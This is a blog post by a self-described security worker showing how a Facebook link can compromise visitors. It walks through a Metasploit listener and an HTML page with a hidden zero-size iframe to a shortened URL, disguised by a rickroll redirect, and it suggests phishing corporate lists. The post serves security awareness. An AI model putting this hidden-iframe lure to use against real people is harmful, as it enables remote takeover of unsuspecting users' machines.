I wanted to make a point to someone and show how easy it is to get hacked…
This is how it started, so let me give you a brief understanding on it.
So in general when you’re on Facebook, you see an article about something, you click on the link and don’t think twice about it. But it’s that simple to get hacked.
You have no idea until it’s too late what that site can do. So to prove this point, I setup a little experiment.
So I fired up Kali Linux and got my metasploit on.
Then we wait for a minute while metasploit sets up the listener.
We now have a link ready for us to use. As you can see in the screen-shot above.
So we go to our favorite web hosting provider and make a simple .html file , in this case it’s a surprise.html
So I made this simple file, lets walk through it…
the line that says <meta http-equiv=”refresh” content=”4;url=https://www.youtube.com/watch?v=dQw4w9WgXcQ” />
basically tells the browser to refresh the page in 4 seconds and redirect and load the youtube site.
<body bgcolor=”#000000″> says to make the background black
<img src=images.jpeg> says to load an image file called images.jpeg (I already had uploaded earlier, but you can link to any file)
<iframe src=”http://tiny.cc/XXXXXXXXXX” height=0 width=0 ></iframe> and this is where the magic happens. This says to create an iframe, with a height of 0 and a width of 0. The URL has been shortened using tiny.CC
So when we look at the site , people will only see the image we put there.
So we now have a metasploit listener waiting, we have a website up and ready to spit out our tiny.CC url and a redirect to make people think the youtube video was the trick.
At this point we are ready to roll 😉
So we pop over to our best social networking site and we post a “social experiment” …..
Then we sit, and we wait and we think, really ? nah, no one will click on it, c’mon who would ….
So we see that , actually people do click on these links when they have no idea what those links do… ah man..
This is why my InfoSec job is hard work, trying to defend against this, how do we stop people clicking ?
Anyways we pop back over to facebook and we post an update ….
And it’s that simple, you could at this point have a meterpreter shell on 1,2,3,4,5 peoples box … 1000’s if you hide this on a large popular website!!
What about popping it in a phishing email and sending it to a corporate DL ?
This leads us to think about how dangerous iframes can be, how hard it is to defend against social engineering and how important user education is…
This type of education needs to start at the school level… the seed needs to be sowed and lessons need to be taught on security.
In this day and age, security is no longer an after thought!
Anyways, can you guess what the youtube video was ……
DISCLAIMER: The site i created is now dismantled, was hosted by me on one of my own domains, the people that clicked were my friends and family not a member of the general public and were spoken to after.